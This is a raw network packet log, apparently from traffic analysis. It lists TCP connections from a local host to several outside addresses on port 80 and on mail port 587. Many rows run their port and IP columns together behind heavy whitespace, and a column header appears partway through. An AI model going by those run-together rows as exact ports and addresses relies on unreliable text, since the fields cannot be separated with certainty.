                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.192790985 CET805002344.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.192810059 CET805002344.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.192868948 CET5002380192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.193044901 CET5002380192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.312964916 CET805002344.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.512639046 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.632738113 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.632829905 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.785604954 CET5002680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.905550003 CET805002654.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.908504963 CET5002680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.908735991 CET5002680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.908778906 CET5002680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.931982040 CET8050024172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.933315992 CET5002480192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.933644056 CET5002480192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.981167078 CET5002780192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:50.028631926 CET805002654.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:50.028640032 CET805002654.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:50.053466082 CET8050024172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:50.102494955 CET8050027172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:50.102618933 CET5002780192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:50.103256941 CET5002780192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:50.103306055 CET5002780192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:50.223153114 CET8050027172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:50.223170042 CET8050027172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:50.843352079 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:50.981872082 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.229851007 CET8050027172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.230273962 CET5002780192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.274379015 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.328284979 CET5002780192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.341267109 CET805002654.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.341363907 CET805002654.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.341475964 CET5002680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.342536926 CET5002680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.394330978 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.448206902 CET8050027172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.462589025 CET805002654.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.512789965 CET5002880192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.632818937 CET805002834.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.633106947 CET5002880192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.633224964 CET5002880192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.633224964 CET5002880192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.674194098 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.674555063 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.753168106 CET805002834.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.753190994 CET805002834.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.794673920 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.941131115 CET5002980192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:52.061408043 CET805002935.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:52.061592102 CET5002980192.168.2.1035.164.78.200
Nov 26, 2024 08:14:52.061834097 CET  50029  80     192.168.2.10     35.164.78.200
Nov 26, 2024 08:14:52.061834097 CET  50029  80     192.168.2.10     35.164.78.200
Nov 26, 2024 08:14:52.074881077 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:52.075521946 CET  50025  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:14:52.182408094 CET  80     50029  35.164.78.200    192.168.2.10
Nov 26, 2024 08:14:52.182467937 CET  80     50029  35.164.78.200    192.168.2.10
Nov 26, 2024 08:14:52.195584059 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:52.480608940 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:52.480645895 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:52.480662107 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:52.480791092 CET  50025  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:14:52.484091997 CET  50025  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:14:52.604017019 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:52.884428978 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:52.886785030 CET  50025  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:14:53.006905079 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:53.057336092 CET  80     50028  34.246.200.160   192.168.2.10
Nov 26, 2024 08:14:53.057393074 CET  80     50028  34.246.200.160   192.168.2.10
Nov 26, 2024 08:14:53.057512045 CET  50028  80     192.168.2.10     34.246.200.160
Nov 26, 2024 08:14:53.057588100 CET  50028  80     192.168.2.10     34.246.200.160
Nov 26, 2024 08:14:53.177570105 CET  80     50028  34.246.200.160   192.168.2.10
Nov 26, 2024 08:14:53.286628008 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:53.288038969 CET  50030  80     192.168.2.10     18.208.156.248
Nov 26, 2024 08:14:53.288239002 CET  50025  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:14:53.408257961 CET  80     50030  18.208.156.248   192.168.2.10
Nov 26, 2024 08:14:53.408273935 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:53.408551931 CET  50030  80     192.168.2.10     18.208.156.248
Nov 26, 2024 08:14:53.408643007 CET  50030  80     192.168.2.10     18.208.156.248
Nov 26, 2024 08:14:53.408674002 CET  50030  80     192.168.2.10     18.208.156.248
Nov 26, 2024 08:14:53.514050961 CET  80     50029  35.164.78.200    192.168.2.10
Nov 26, 2024 08:14:53.514103889 CET  80     50029  35.164.78.200    192.168.2.10
Nov 26, 2024 08:14:53.514277935 CET  50029  80     192.168.2.10     35.164.78.200
Nov 26, 2024 08:14:53.514337063 CET  50029  80     192.168.2.10     35.164.78.200
Nov 26, 2024 08:14:53.528595924 CET  80     50030  18.208.156.248   192.168.2.10
Nov 26, 2024 08:14:53.528635025 CET  80     50030  18.208.156.248   192.168.2.10
Nov 26, 2024 08:14:53.634411097 CET  80     50029  35.164.78.200    192.168.2.10
Nov 26, 2024 08:14:53.688426971 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:53.689017057 CET  50025  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:14:53.814544916 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:54.060455084 CET  50031  80     192.168.2.10     3.94.10.34
Nov 26, 2024 08:14:54.104398012 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:54.104674101 CET  50025  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:14:54.182476044 CET  80     50031  3.94.10.34       192.168.2.10
Nov 26, 2024 08:14:54.182650089 CET  50031  80     192.168.2.10     3.94.10.34
Nov 26, 2024 08:14:54.182830095 CET  50031  80     192.168.2.10     3.94.10.34
Nov 26, 2024 08:14:54.182858944 CET  50031  80     192.168.2.10     3.94.10.34
Nov 26, 2024 08:14:54.226797104 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:54.303170919 CET  80     50031  3.94.10.34       192.168.2.10
Nov 26, 2024 08:14:54.303184986 CET  80     50031  3.94.10.34       192.168.2.10
Nov 26, 2024 08:14:54.505573988 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:54.505897999 CET  50025  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:14:54.551651001 CET  80     50030  18.208.156.248   192.168.2.10
Nov 26, 2024 08:14:54.551714897 CET  80     50030  18.208.156.248   192.168.2.10
Nov 26, 2024 08:14:54.551827908 CET  50030  80     192.168.2.10     18.208.156.248
Nov 26, 2024 08:14:54.552360058 CET  50030  80     192.168.2.10     18.208.156.248
Nov 26, 2024 08:14:54.627342939 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:54.672791004 CET  80     50030  18.208.156.248   192.168.2.10
Nov 26, 2024 08:14:54.743756056 CET  50032  80     192.168.2.10     208.100.26.245
Nov 26, 2024 08:14:54.865752935 CET  80     50032  208.100.26.245   192.168.2.10
Nov 26, 2024 08:14:54.867371082 CET  50032  80     192.168.2.10     208.100.26.245
Nov 26, 2024 08:14:54.867569923 CET  50032  80     192.168.2.10     208.100.26.245
Nov 26, 2024 08:14:54.867599010 CET  50032  80     192.168.2.10     208.100.26.245
Nov 26, 2024 08:14:54.909909964 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:54.913466930 CET  50025  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:14:54.987502098 CET  80     50032  208.100.26.245   192.168.2.10
Nov 26, 2024 08:14:54.987519026 CET  80     50032  208.100.26.245   192.168.2.10
Nov 26, 2024 08:14:55.034221888 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:55.314692020 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:55.315057039 CET  50025  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:14:55.315057039 CET  50025  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:14:55.315119982 CET  50025  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:14:55.315170050 CET  50025  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:14:55.316322088 CET  50025  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:14:55.325854063 CET  80     50031  3.94.10.34       192.168.2.10
Nov 26, 2024 08:14:55.326078892 CET  80     50031  3.94.10.34       192.168.2.10
Nov 26, 2024 08:14:55.326251030 CET  50031  80     192.168.2.10     3.94.10.34
Nov 26, 2024 08:14:55.326371908 CET  50031  80     192.168.2.10     3.94.10.34
Nov 26, 2024 08:14:55.437396049 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:55.437426090 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:55.437439919 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:55.437458992 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:55.437474012 CET  50025  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:14:55.437560081 CET  50025  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:14:55.438406944 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:55.438430071 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:55.438441992 CET  587    50025  51.195.88.199    192.168.2.10
Nov 26, 2024 08:14:55.438462973 CET  50025  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:14:55.438496113 CET  50025  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:14:55.438508034 CET  587    50025  51.195.88.199    192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.438615084 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.438623905 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.438641071 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.438667059 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.438687086 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.438700914 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.438714981 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.438724995 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.438790083 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.438790083 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.447710991 CET80500313.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.477021933 CET5003380192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.558660984 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.558753014 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.558847904 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.559776068 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.559842110 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.559919119 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.559972048 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.560000896 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.560075045 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.560122967 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.560206890 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.560218096 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.560265064 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.560283899 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.560303926 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.560360909 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.560378075 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.560405016 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.599399090 CET8050033165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.603286982 CET5003380192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.603490114 CET5003380192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.603517056 CET5003380192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.604929924 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.604990959 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.688374043 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.688440084 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.724395990 CET8050033165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.724407911 CET8050033165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.725447893 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.725507021 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.808373928 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.808432102 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.086076975 CET8050032208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.158560038 CET5003280192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.159147978 CET5003480192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.179182053 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.220065117 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.278911114 CET8050032208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.278999090 CET5003280192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.279011965 CET8050034208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.279191971 CET5003480192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.282088041 CET5003480192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.282118082 CET5003480192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.402004004 CET8050034208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.402013063 CET8050034208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.906814098 CET8050033165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.909790993 CET5003380192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.909827948 CET5003380192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.030999899 CET8050033165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.031014919 CET8050033165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.322197914 CET8050033165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.387952089 CET5003380192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.448985100 CET8050034208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.575356960 CET5003480192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.750399113 CET5003580192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.872140884 CET805003513.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.875320911 CET5003580192.168.2.1013.251.16.150
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 26, 2024 08:14:57.875519991 CET  50035        80         192.168.2.10     13.251.16.150
Nov 26, 2024 08:14:57.875581026 CET  50035        80         192.168.2.10     13.251.16.150
Nov 26, 2024 08:14:57.897103071 CET  50036        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:14:57.996184111 CET  80           50035      13.251.16.150    192.168.2.10
Nov 26, 2024 08:14:57.996197939 CET  80           50035      13.251.16.150    192.168.2.10
Nov 26, 2024 08:14:58.017275095 CET  80           50036      54.244.188.177   192.168.2.10
Nov 26, 2024 08:14:58.017522097 CET  50036        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:14:58.017720938 CET  50036        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:14:58.017738104 CET  50036        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:14:58.139523029 CET  80           50036      54.244.188.177   192.168.2.10
Nov 26, 2024 08:14:58.139539003 CET  80           50036      54.244.188.177   192.168.2.10
Nov 26, 2024 08:14:59.463737965 CET  80           50036      54.244.188.177   192.168.2.10
Nov 26, 2024 08:14:59.463769913 CET  80           50036      54.244.188.177   192.168.2.10
Nov 26, 2024 08:14:59.463932991 CET  50036        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:14:59.475445032 CET  50036        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:14:59.595482111 CET  80           50036      54.244.188.177   192.168.2.10
Nov 26, 2024 08:14:59.976989985 CET  80           50035      13.251.16.150    192.168.2.10
Nov 26, 2024 08:14:59.978884935 CET  50035        80         192.168.2.10     13.251.16.150
Nov 26, 2024 08:14:59.991283894 CET  80           50035      13.251.16.150    192.168.2.10
Nov 26, 2024 08:14:59.991339922 CET  50035        80         192.168.2.10     13.251.16.150
Nov 26, 2024 08:15:00.111685038 CET  80           50035      13.251.16.150    192.168.2.10
Nov 26, 2024 08:15:00.133080959 CET  50019        80         192.168.2.10     208.100.26.245
Nov 26, 2024 08:15:00.133403063 CET  50037        80         192.168.2.10     208.100.26.245
Nov 26, 2024 08:15:00.154975891 CET  50038        80         192.168.2.10     44.221.84.105
Nov 26, 2024 08:15:00.253318071 CET  80           50037      208.100.26.245   192.168.2.10
Nov 26, 2024 08:15:00.253370047 CET  80           50019      208.100.26.245   192.168.2.10
Nov 26, 2024 08:15:00.253412962 CET  50037        80         192.168.2.10     208.100.26.245
Nov 26, 2024 08:15:00.253467083 CET  50019        80         192.168.2.10     208.100.26.245
Nov 26, 2024 08:15:00.254658937 CET  50037        80         192.168.2.10     208.100.26.245
Nov 26, 2024 08:15:00.254739046 CET  50037        80         192.168.2.10     208.100.26.245
Nov 26, 2024 08:15:00.275979996 CET  80           50038      44.221.84.105    192.168.2.10
Nov 26, 2024 08:15:00.276220083 CET  50038        80         192.168.2.10     44.221.84.105
Nov 26, 2024 08:15:00.276310921 CET  50038        80         192.168.2.10     44.221.84.105
Nov 26, 2024 08:15:00.276422024 CET  50038        80         192.168.2.10     44.221.84.105
Nov 26, 2024 08:15:00.374558926 CET  80           50037      208.100.26.245   192.168.2.10
Nov 26, 2024 08:15:00.374584913 CET  80           50037      208.100.26.245   192.168.2.10
Nov 26, 2024 08:15:00.396411896 CET  80           50038      44.221.84.105    192.168.2.10
Nov 26, 2024 08:15:00.396424055 CET  80           50038      44.221.84.105    192.168.2.10
Nov 26, 2024 08:15:01.376210928 CET  80           50038      44.221.84.105    192.168.2.10
Nov 26, 2024 08:15:01.376384020 CET  80           50038      44.221.84.105    192.168.2.10
Nov 26, 2024 08:15:01.376475096 CET  50038        80         192.168.2.10     44.221.84.105
Nov 26, 2024 08:15:01.376622915 CET  50038        80         192.168.2.10     44.221.84.105
Nov 26, 2024 08:15:01.423175097 CET  80           50037      208.100.26.245   192.168.2.10
Nov 26, 2024 08:15:01.425856113 CET  50037        80         192.168.2.10     208.100.26.245
Nov 26, 2024 08:15:01.425915956 CET  50037        80         192.168.2.10     208.100.26.245
Nov 26, 2024 08:15:01.496479034 CET  80           50038      44.221.84.105    192.168.2.10
Nov 26, 2024 08:15:01.548027992 CET  80           50037      208.100.26.245   192.168.2.10
Nov 26, 2024 08:15:01.548058987 CET  80           50037      208.100.26.245   192.168.2.10
Nov 26, 2024 08:15:01.556490898 CET  50039        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:15:01.676578045 CET  80           50039      54.244.188.177   192.168.2.10
Nov 26, 2024 08:15:01.676737070 CET  50039        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:15:01.682318926 CET  50039        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:15:01.683294058 CET  50039        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:15:01.770710945 CET  80           50037      208.100.26.245   192.168.2.10
Nov 26, 2024 08:15:01.802320004 CET  80           50039      54.244.188.177   192.168.2.10
Nov 26, 2024 08:15:01.803483963 CET  80           50039      54.244.188.177   192.168.2.10
Nov 26, 2024 08:15:01.887923002 CET  50037        80         192.168.2.10     208.100.26.245
Nov 26, 2024 08:15:02.638993979 CET  50040        80         192.168.2.10     34.211.97.45
Nov 26, 2024 08:15:02.761750937 CET  80           50040      34.211.97.45     192.168.2.10
Nov 26, 2024 08:15:02.762487888 CET  50040        80         192.168.2.10     34.211.97.45
Nov 26, 2024 08:15:02.762713909 CET  50040        80         192.168.2.10     34.211.97.45
Nov 26, 2024 08:15:02.762759924 CET  50040        80         192.168.2.10     34.211.97.45
Nov 26, 2024 08:15:02.882637024 CET  80           50040      34.211.97.45     192.168.2.10
Nov 26, 2024 08:15:02.882667065 CET  80           50040      34.211.97.45     192.168.2.10
Nov 26, 2024 08:15:03.034835100 CET  80           50039      54.244.188.177   192.168.2.10
Nov 26, 2024 08:15:03.034905910 CET  80           50039      54.244.188.177   192.168.2.10
Nov 26, 2024 08:15:03.035216093 CET  50039        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:15:03.035216093 CET  50039        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:15:03.155210972 CET  80           50039      54.244.188.177   192.168.2.10
Nov 26, 2024 08:15:03.214134932 CET  50041        80         192.168.2.10     35.164.78.200
Nov 26, 2024 08:15:03.334120035 CET  80           50041      35.164.78.200    192.168.2.10
Nov 26, 2024 08:15:03.334495068 CET  50041        80         192.168.2.10     35.164.78.200
Nov 26, 2024 08:15:03.334789991 CET  50041        80         192.168.2.10     35.164.78.200
Nov 26, 2024 08:15:03.334789991 CET  50041        80         192.168.2.10     35.164.78.200
Nov 26, 2024 08:15:03.454792023 CET  80           50041      35.164.78.200    192.168.2.10
Nov 26, 2024 08:15:03.454849005 CET  80           50041      35.164.78.200    192.168.2.10
Nov 26, 2024 08:15:04.208981991 CET  80           50040      34.211.97.45     192.168.2.10
Nov 26, 2024 08:15:04.209110975 CET  80           50040      34.211.97.45     192.168.2.10
Nov 26, 2024 08:15:04.209162951 CET  50040        80         192.168.2.10     34.211.97.45
Nov 26, 2024 08:15:04.209233046 CET  50040        80         192.168.2.10     34.211.97.45
Nov 26, 2024 08:15:04.329341888 CET  80           50040      34.211.97.45     192.168.2.10
